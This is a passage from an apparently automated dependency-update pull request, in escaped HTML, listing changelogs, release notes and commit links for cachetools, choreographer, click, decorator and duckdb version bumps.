href=\"https://github.com/tkem/cachetools/commit/91828fccd629d426157a165d38563614ba06a875\"\u003e\u003ccode\u003e91828fc\u003c/code\u003e\u003c/a\u003e Run threading tests unconditionally with timeout.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/16952edb1eb2d2ced7601e12db722008e5156912\"\u003e\u003ccode\u003e16952ed\u003c/code\u003e\u003c/a\u003e Release v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/92dd756b93813d1ddfe70893e9c219342a52e19a\"\u003e\u003ccode\u003e92dd756\u003c/code\u003e\u003c/a\u003e Prepare v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/ced08f52ef792a010b8171715c7842da4e11b9ac\"\u003e\u003ccode\u003eced08f5\u003c/code\u003e\u003c/a\u003e Improve cachetools.func type stubs.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/d809d7be5a222effd3663c33baaaee3802972daa\"\u003e\u003ccode\u003ed809d7b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c84b5e5be3d33a32d33f0988b524fb86de1e44f2\"\u003e\u003ccode\u003ec84b5e5\u003c/code\u003e\u003c/a\u003e Release v7.1.2.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/39ad61c1db56600fe903f3c4216996c491e775bf\"\u003e\u003ccode\u003e39ad61c\u003c/code\u003e\u003c/a\u003e Prepare v7.1.2.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tkem/cachetools/compare/v7.0.5...v7.1.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `choreographer` from 1.2.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/plotly/choreographer/blob/main/CHANGELOG.txt\"\u003echoreographer's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003ev1.3.0\nv1.3.0rc2\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCheck path validity for browser with is_file()\u003c/li\u003e\n\u003cli\u003eAdd option --verify_local in choreo_diagnose and fix local reporting logic\nv1.3.0rc1\u003c/li\u003e\n\u003cli\u003eWe now look for old download path as well as new download path\nv1.3.0rc0\u003c/li\u003e\n\u003cli\u003eChange to process group for better killing of multi-process chrome\u003c/li\u003e\n\u003cli\u003eAdd argument to Session/Target \u003ccode\u003esend_command(..., *, with_perf: bool)\u003c/code\u003e to\nreturn timing information about browser write/read.\u003c/li\u003e\n\u003cli\u003eUpdate default chrome from 135.0.7011.0/1418433 to 144.0.7527.0/1544685\u003c/li\u003e\n\u003cli\u003eFix: New chrome takes longer/doesn't populate targets right away, so add a\nretry loop to populate targets\u003c/li\u003e\n\u003cli\u003eAlter \u003ccode\u003eget_chrome\u003c/code\u003e verbose to print whole JSON\u003c/li\u003e\n\u003cli\u003eChange chrome download path to use XDG cache dir\u003c/li\u003e\n\u003cli\u003eDon't download chrome if we already have that version: add force argument\u003c/li\u003e\n\u003cli\u003eRemove unused system inspection code\u003c/li\u003e\n\u003cli\u003eAdd a set of helper functions to await for tab loading and send javascript\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/92147b1ccf024ae647f29ebf43057564011e06c9\"\u003e\u003ccode\u003e92147b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/choreographer/issues/296\"\u003e#296\u003c/a\u003e from plotly/cam/update-changelog-v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/8851fc919bc7dfb27a48541543f1ff195c48eda3\"\u003e\u003ccode\u003e8851fc9\u003c/code\u003e\u003c/a\u003e Updates to release version v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/3128bddf909381a2b4205f0e28c0c3cb8b13498c\"\u003e\u003ccode\u003e3128bdd\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/choreographer/issues/288\"\u003e#288\u003c/a\u003e from plotly/andrew/more_local_logic\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/a6f478e00fb81ad22db7c7c1d31028fb4ab20311\"\u003e\u003ccode\u003ea6f478e\u003c/code\u003e\u003c/a\u003e Add to changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/953e19ad5dc395a3554cfbaf25599a8a3db6d933\"\u003e\u003ccode\u003e953e19a\u003c/code\u003e\u003c/a\u003e Check browser is file whwen checking path validity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/d062e355b819b84e57060d4e48fbe2aa6f063259\"\u003e\u003ccode\u003ed062e35\u003c/code\u003e\u003c/a\u003e Change default setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/c0c97fc64a55c773dd7484674996cf55d74249a1\"\u003e\u003ccode\u003ec0c97fc\u003c/code\u003e\u003c/a\u003e Add option to verify local with choreo_diagnose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/7ade1922269a6999c06f2ff92b34a1770bba6d3e\"\u003e\u003ccode\u003e7ade192\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/choreographer/issues/286\"\u003e#286\u003c/a\u003e from plotly/andrew/roadmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/edf284c8973dd9dc7f7b2f77a53481fe6f0d2671\"\u003e\u003ccode\u003eedf284c\u003c/code\u003e\u003c/a\u003e Update Roadmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/choreographer/commit/c1b7abce535feb79748c888ba1130b985c13eb3f\"\u003e\u003ccode\u003ec1b7abc\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/plotly/choreographer/compare/v1.2.1...v1.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `click` from 8.3.2 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/releases\"\u003eclick's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.1 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.1/\"\u003ehttps://pypi.org/project/click/8.4.1/\u003c/a\u003e\nChanges: \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-1\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-1\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/click/milestone/32?closed=1\"\u003ehttps://github.com/pallets/click/milestone/32?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type conversion again. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3458\"\u003e#3458\u003c/a\u003e \u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3277\"\u003e#3277\u003c/a\u003e # 3466\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion result. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3015\"\u003e#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3487\"\u003e#3487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3449\"\u003e#3449\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.0 feature release. A feature release may include new features, remove previously deprecated code, add new deprecation, or introduce potentially breaking changes.\u003c/p\u003e\n\u003cp\u003eWe encourage everyone to upgrade. You can read more about our \u003ca href=\"https://palletsprojects.com/versions\"\u003eVersion Support Policy\u003c/a\u003e on our website.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.0/\"\u003ehttps://pypi.org/project/click/8.4.0/\u003c/a\u003e\nChanges:  \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-0\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-0\u003c/a\u003e\nMilestone \u003ca href=\"https://github.com/pallets/click/milestone/30\"\u003ehttps://github.com/pallets/click/milestone/30\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParamType\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3371\"\u003e#3371\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n\u003ca href=\"https://redirect.github.com/pallets/click/issues/3372\"\u003e#3372\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParameter\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/2805\"\u003e#2805\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/blob/main/CHANGES.rst\"\u003eclick's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 8.4.1\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type\nconversion again. :issue:\u003ccode\u003e3458\u003c/code\u003e :issue:\u003ccode\u003e3484\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. :issue:\u003ccode\u003e3277\u003c/code\u003e :pr:\u003ccode\u003e3466\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion\nresult. :issue:\u003ccode\u003e3015\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. :issue:\u003ccode\u003e3487\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. :issue:\u003ccode\u003e3449\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 8.4.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-17\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e3371\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n:pr:\u003ccode\u003e3372\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e2805\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\n:issue:\u003ccode\u003e2745\u003c/code\u003e :pr:\u003ccode\u003e3364\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAuto-detect \u003ccode\u003etype=UNPROCESSED\u003c/code\u003e for \u003ccode\u003eflag_value\u003c/code\u003e of non-basic types\n(not \u003ccode\u003estr\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e, \u003ccode\u003efloat\u003c/code\u003e, or \u003ccode\u003ebool\u003c/code\u003e), so programmer-provided\nPython objects like classes and enum members are passed through unchanged\ninstead of being stringified. Previously \u003ccode\u003etype=click.UNPROCESSED\u003c/code\u003e had\nto be set explicitly. :issue:\u003ccode\u003e2012\u003c/code\u003e :pr:\u003ccode\u003e3363\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6eeb50e948ea136db145280f6f5dd52eca3fa7e5\"\u003e\u003ccode\u003e6eeb50e\u003c/code\u003e\u003c/a\u003e release version 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/67921d5b71584112eebcbf89596b5f0e6d14c49f\"\u003e\u003ccode\u003e67921d5\u003c/code\u003e\u003c/a\u003e change log and doc fixes (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3495\"\u003e#3495\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/9c41f46a4015700489ad009266edf1f3893d01d1\"\u003e\u003ccode\u003e9c41f46\u003c/code\u003e\u003c/a\u003e Fix changelog and version admonitions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6cb34774f20598aa288332f8da02c5aee85448a6\"\u003e\u003ccode\u003e6cb3477\u003c/code\u003e\u003c/a\u003e fix skip condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/5ee8e3123d8ddece6c47eff9a7a7d4ca478c4f37\"\u003e\u003ccode\u003e5ee8e31\u003c/code\u003e\u003c/a\u003e fix I/O operation on closed file error with CliRunner and echo_via_pager (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3482\"\u003e#3482\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/becbde5cf416441627f779e8dd34e57738ee1c1f\"\u003e\u003ccode\u003ebecbde5\u003c/code\u003e\u003c/a\u003e pager doesn't close std streams\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/a5f5aa6d4012d256ccca24638f2642fc371e9f77\"\u003e\u003ccode\u003ea5f5aa6\u003c/code\u003e\u003c/a\u003e Handle empty bytes in echo (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3493\"\u003e#3493\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/4d3db84b251518e97299a38a5ca4bab3d01873a2\"\u003e\u003ccode\u003e4d3db84\u003c/code\u003e\u003c/a\u003e handle empty bytes in echo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/d42f15b71757de791a5781fb179fd972da9169f5\"\u003e\u003ccode\u003ed42f15b\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eget_parameter_source()\u003c/code\u003e during type conversion and eager callbacks (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/0baa8db07736fc7ad3d3eed97d4c73b0059c63e1\"\u003e\u003ccode\u003e0baa8db\u003c/code\u003e\u003c/a\u003e Document ctx.params bypass with test and doc\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/click/compare/8.3.2...8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `decorator` from 5.2.1 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micheles/decorator/blob/master/CHANGES.md\"\u003edecorator's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.3.1 (2026-05-18)\u003c/h2\u003e\n\u003cp\u003eAdded license SPDX identifier to pyproject.toml (reported by\nChristian Lackas).\u003c/p\u003e\n\u003ch2\u003e5.3.0 (2026-05-17)\u003c/h2\u003e\n\u003cp\u003eAdded official support for Python 3.14 (thanks to Hugo van Kemenade,\nDavid Cain and the GitHub user bersbersbers).\nFixed a bug with \u0026quot;return await\u0026quot; contributed by Kadir Can Ozden.\nMoved decorator.py to a package structure (\u003ccode\u003edecorator/__init__.py\u003c/code\u003e) and\nadded a stub file (\u003ccode\u003edecorator/__init__.pyi\u003c/code\u003e) contributed by Marco Gorelli.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/426e9e35d563ffe356e54bd0f970d153b8f25370\"\u003e\u003ccode\u003e426e9e3\u003c/code\u003e\u003c/a\u003e Bumped the version to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/062ff0e0c33733f2148a5590d118a8570df846d5\"\u003e\u003ccode\u003e062ff0e\u003c/code\u003e\u003c/a\u003e Fixed the dependency on setuptools\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/086ff5d95d4dc550117c12647a4427d70bf8833d\"\u003e\u003ccode\u003e086ff5d\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/5807a83ead31f0de5303fa950ddea49d850d7355\"\u003e\u003ccode\u003e5807a83\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/093aced11439251e496b47a9a9369501075e8d1a\"\u003e\u003ccode\u003e093aced\u003c/code\u003e\u003c/a\u003e Updated changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/e9ced7e63ad9502b3e2a3e3db5f5f1ccc16c5fd6\"\u003e\u003ccode\u003ee9ced7e\u003c/code\u003e\u003c/a\u003e Added license SPDX\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/b3e82ddc04e8d0c18c51eecb30b4a59aee5aac1d\"\u003e\u003ccode\u003eb3e82dd\u003c/code\u003e\u003c/a\u003e Fixed CHANGES.md [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/f1ce8da8522193421436c368849afe886666b4e5\"\u003e\u003ccode\u003ef1ce8da\u003c/code\u003e\u003c/a\u003e Doc fix [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/c924d7c6aa2e47a0627706c385101ff8d558d091\"\u003e\u003ccode\u003ec924d7c\u003c/code\u003e\u003c/a\u003e Updated supported versions [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/8b83e8cca35f5c773654ce4ae89b4e3f84f430d3\"\u003e\u003ccode\u003e8b83e8c\u003c/code\u003e\u003c/a\u003e Fixed CHANGES [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micheles/decorator/compare/5.2.1...5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `duckdb` from 1.5.2 to 1.5.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/duckdb/duckdb-python/releases\"\u003educkdb's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.5.3 Bugfix Release\u003c/h2\u003e\n\u003cp\u003eSee the DuckDB core release notes here: \u003ca href=\"https://github.com/duckdb/duckdb/releases/tag/v1.5.3\"\u003ehttps://github.com/duckdb/duckdb/releases/tag/v1.5.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eWhat's Changed in DuckDB Python\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eExport all symbols by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/445\"\u003educkdb/duckdb-python#445\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix concjunction OR by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/465\"\u003educkdb/duckdb-python#465\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse recursive mutex to deal with GIL \u0026lt;-\u0026gt; internal lock deadlocks by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/462\"\u003educkdb/duckdb-python#462\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow self-joining of Polars lazyframes by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/466\"\u003educkdb/duckdb-python#466\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/duckdb/duckdb-python/compare/v1.5.2...v1.5.3\"\u003ehttps://github.com/duckdb/duckdb-python/compare/v1.5.2...v1.5.3\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/811b135ee5a0449378ab9635e0284b96485d58d6\"\u003e\u003ccode\u003e811b135\u003c/code\u003e\u003c/a\u003e DuckDB submodule pinned at v1.5.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/289bfbdc2914894ccbb41028a84abef34448126e\"\u003e\u003ccode\u003e289bfbd\u003c/code\u003e\u003c/a\u003e Bump submodule\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/f87d6d938fca2d7b1ae713396e77c86622d17e79\"\u003e\u003ccode\u003ef87d6d9\u003c/code\u003e\u003c/a\u003e Allow self-joining of Polars lazyframes (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/466\"\u003e#466\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/c88229d86bf8e5ff266abc06cc620dc13d9d3529\"\u003e\u003ccode\u003ec88229d\u003c/code\u003e\u003c/a\u003e Allow self-joining of Polars lazyframes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/559f6af94b5c10e863b5e09b318c5c9f6d6c6dda\"\u003e\u003ccode\u003e559f6af\u003c/code\u003e\u003c/a\u003e Only disable unity builds for editable installs on OSX\u003c/li\u003e\n\u003cli\u003e\u003ca 